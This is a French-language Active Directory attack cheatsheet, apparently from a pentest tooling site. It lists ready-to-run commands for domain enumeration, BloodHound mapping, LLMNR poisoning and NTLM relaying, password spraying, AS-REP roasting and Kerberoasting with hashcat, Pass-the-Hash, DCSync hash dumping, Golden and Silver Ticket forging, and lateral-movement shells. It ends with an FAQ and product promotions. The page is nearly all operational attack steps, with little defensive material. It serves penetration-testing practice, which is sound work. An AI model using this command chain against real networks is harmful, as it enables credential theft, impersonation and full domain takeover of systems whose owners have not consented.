Active Directory — Cheatsheet Attaques 2026

La référence complète d'attaque Active Directory — de l'énumération non authentifiée au Domain Admin. Kerberoasting, relais NTLM, Pass-the-Hash, DCSync, Golden Ticket, BloodHound et mouvement latéral.

Dernière mise à jour :

Débutant ? Lisez notre guide complet pour débuter et situez les attaques AD dans la méthodologie.

Navigation rapide

01 Énumération 02 BloodHound 03 LLMNR / Relais NTLM 04 Password Spraying 05 AS-REP Roasting 06 Kerberoasting 07 Pass-the-Hash 08 DCSync 09 Golden / Silver Ticket 10 Mouvement latéral

# Énumération du domaine

Cartographiez le domaine avant d'attaquer. NetExec (ex-CrackMapExec) et Impacket sont les chevaux de bataille. Commencez sans authentification, puis recommencez avec chaque identifiant récupéré.

nxc smb 10.10.10.0/24
Balayer le sous-réseau — identifier hôtes, nom de domaine, signature SMB
enum4linux-ng -A DC_IP
Énumération non authentifiée complète : utilisateurs, partages, groupes, politique de mot de passe
nxc smb DC_IP -u '' -p '' --users
Énumération des utilisateurs par session nulle
ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName
Énumérer tous les utilisateurs du domaine via LDAP
nxc smb DC_IP -u user -p pass --shares
Lister les partages accessibles avec des identifiants valides
nxc smb DC_IP -u user -p pass --pass-pol
Récupérer la politique de mot de passe (seuil de verrouillage avant spraying)
GetADUsers.py -all domain/user:pass -dc-ip DC_IP
Impacket — lister tous les utilisateurs avec dernière connexion et date de création

# BloodHound — cartographier les chemins vers DA

BloodHound trace le chemin d'attaque le plus court vers Domain Admin. Collectez les données, puis laissez le graphe planifier votre chaîne.

bloodhound-python -u user -p pass -d domain.local -ns DC_IP -c all
Collecteur Python — rien à exécuter sur la cible
nxc ldap DC_IP -u user -p pass --bloodhound --collection-method all
Collecter les données BloodHound directement depuis NetExec
.\SharpHound.exe -c All
Collecteur Windows lancé depuis un pied dans le domaine
💡 Astuce : après l'import, lancez la requête intégrée « Shortest Paths to Domain Admins » et marquez les nœuds compromis en « Owned » pour révéler les chaînes déjà exploitables.

# Empoisonnement LLMNR/NBT-NS & relais NTLM

Sans aucun identifiant, empoisonnez la résolution de noms pour capturer des hash NetNTLM — puis cassez-les ou relayez-les.

responder -I eth0 -wv
Empoisonner LLMNR/NBT-NS/MDNS et capturer des hash NetNTLMv2
hashcat -m 5600 hashes.txt rockyou.txt
Casser les hash NetNTLMv2 capturés hors ligne
ntlmrelayx.py -tf targets.txt -smb2support
Relayer l'authentification capturée vers des hôtes sans signature SMB
ntlmrelayx.py -t ldap://DC_IP --escalate-user user
Relayer vers LDAP pour accorder à votre utilisateur des droits DCSync

# Password Spraying

Testez un mot de passe courant sur tous les utilisateurs — restez sous le seuil de verrouillage récupéré dans la politique.

nxc smb DC_IP -u users.txt -p 'Saison2026!' --continue-on-success
Pulvériser un seul mot de passe sur tous les utilisateurs
kerbrute passwordspray -d domain.local users.txt 'Welcome1'
Spray basé sur Kerberos (plus discret sur certains setups)
nxc smb DC_IP -u users.txt -p passwords.txt --no-bruteforce
Associer user[i] à password[i] (credential stuffing)
⚠️ Attention : vérifiez toujours --pass-pol d'abord. Verrouiller des comptes est bruyant et perturbant — ne pulvérisez jamais à l'aveugle.

# AS-REP Roasting

Les comptes sans pré-authentification Kerberos permettent de demander un AS-REP et de le casser hors ligne — parfois sans aucun identifiant.

GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip DC_IP
Trouver les comptes AS-REP roastables sans identifiants
GetNPUsers.py domain/user:pass -request -dc-ip DC_IP
Authentifié — récupérer tous les hash AS-REP du domaine
hashcat -m 18200 asrep.txt rockyou.txt
Casser les hash AS-REP hors ligne

# Kerberoasting

Tout utilisateur authentifié peut demander des TGS pour les comptes SPN. Les mots de passe des comptes de service sont souvent faibles — cassez-les pour escalader.

GetUserSPNs.py domain/user:pass -dc-ip DC_IP -request
Demander les TGS de tous les comptes SPN (Impacket)
nxc ldap DC_IP -u user -p pass --kerberoasting kerb.txt
Kerberoaster directement depuis NetExec
hashcat -m 13100 kerb.txt rockyou.txt
Casser les hash TGS hors ligne
💡 Astuce : ciblez d'abord les SPN à forte valeur — les comptes de service membres de groupes privilégiés offrent le plus grand bond.

# Pass-the-Hash

Authentifiez-vous avec un hash NTLM au lieu d'un mot de passe — aucun cassage requis. La colonne vertébrale du mouvement latéral AD.

nxc smb CIBLE -u Administrator -H aad3b435b51404ee:HASH
Valider le hash sur plusieurs hôtes — cherchez Pwn3d!
evil-winrm -i CIBLE -u Administrator -H HASH
Obtenir un shell PowerShell interactif avec le hash
psexec.py -hashes :HASH Administrator@CIBLE
Shell SYSTEM via Impacket PsExec avec le hash
secretsdump.py -hashes :HASH Administrator@CIBLE
Extraire SAM local + secrets LSA de la cible

# DCSync

Avec des droits de réplication, demandez à un contrôleur de domaine le hash de n'importe quel compte — dont krbtgt, la clé des Golden Tickets.

secretsdump.py domain/user:pass@DC_IP
DCSync distant — extraire tous les hash du domaine
secretsdump.py domain/user:pass@DC_IP -just-dc-user krbtgt
Extraire uniquement le hash krbtgt (pour Golden Ticket)
nxc smb DC_IP -u user -p pass --ntds
Extraire la base NTDS.dit via NetExec

# Golden & Silver Tickets

Forgez des tickets Kerberos pour un contrôle total et persistant. Golden = TGT forgé (hash krbtgt). Silver = TGS forgé pour un service (hash du compte de service).

ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain domain.local Administrator
Forger un Golden Ticket usurpant Administrator
export KRB5CCNAME=Administrator.ccache; psexec.py -k -no-pass domain.local/Administrator@DC
Utiliser le ticket forgé pour obtenir un shell SYSTEM
ticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-... -domain domain.local -spn cifs/server Administrator
Forger un Silver Ticket pour un service précis (plus discret — aucun contact DC)

# Mouvement latéral & shells

Déplacez-vous entre les hôtes avec les identifiants et tickets collectés.

OutilAccèsNotes
psexec.pySYSTEMBruyant, crée un service — le plus détecté
wmiexec.pyUtilisateurSemi-interactif, sans service (plus discret)
smbexec.pySYSTEMAucun fichier déposé sur le disque
evil-winrmUtilisateurPowerShell complet — nécessite WinRM (5985)
atexec.pySYSTEMExécute via une tâche planifiée
wmiexec.py domain/user:pass@CIBLE
Shell semi-interactif discret via WMI
evil-winrm -i CIBLE -u user -p pass
PowerShell interactif via WinRM
nxc smb CIBLES.txt -u user -p pass -x "whoami"
Exécuter une commande sur plusieurs hôtes à la fois

❓ FAQ pentest Active Directory

L'énumération. Sans authentification, lancez responder pour capturer des hash et enum4linux-ng/nxc contre le domaine. Dès que vous avez des identifiants, collectez la surface d'attaque avec BloodHound.

Demander des TGS pour les comptes ayant un SPN. Le ticket est chiffré avec le hash du compte de service, cassé hors ligne avec hashcat -m 13100. Tout utilisateur du domaine peut les demander — attaque classique de faible vers haut privilège.

Le Kerberoasting vise les comptes SPN et casse le TGS (-m 13100). L'AS-REP roasting vise les comptes sans pré-auth Kerberos et casse l'AS-REP (-m 18200) — possible sans identifiants si vous connaissez un nom valide.

S'authentifier avec un hash NTLM au lieu d'un mot de passe en clair. Des outils comme nxc, evil-winrm et Impacket acceptent -H pour utiliser le hash directement — sans cassage.

Abuser de la réplication d'annuaire pour demander à un DC le hash de n'importe quel compte — dont krbtgt et les Domain Admins. Nécessite des droits de réplication ; secretsdump.py l'exécute à distance.

Un TGT forgé signé avec le hash krbtgt. Comme krbtgt signe chaque ticket, posséder son hash permet d'usurper n'importe qui (dont Domain Admin) indéfiniment — la persistance ultime. Récupérez d'abord le hash krbtgt via DCSync.

Il trace les chemins les plus courts vers Domain Admin à partir des données AD (utilisateurs, groupes, sessions, ACL). Collectez avec SharpHound ou bloodhound-python, puis lancez « Shortest Path to Domain Admins ».

NetExec (ex-CrackMapExec), Impacket (secretsdump, GetUserSPNs, psexec, ntlmrelayx), Responder, BloodHound, evil-winrm et hashcat. La plupart sont fournis avec Kali Linux.

📚 Ressources liées

Rapport de pentest assisté par IA

Transformez votre compromission AD en rapport PDF professionnel. L'IA remplit CVE, CVSS et sévérité.

Essayer gratuitement →

Envie des 12 020+ commandes ?

Cette cheatsheet AD n'est qu'une branche de la carte. Pentest Mindmap organise 12 020+ commandes en 34 catégories — de la recon à la post-exploitation — avec recherche instantanée et copie en un clic.

Commencer gratuitement →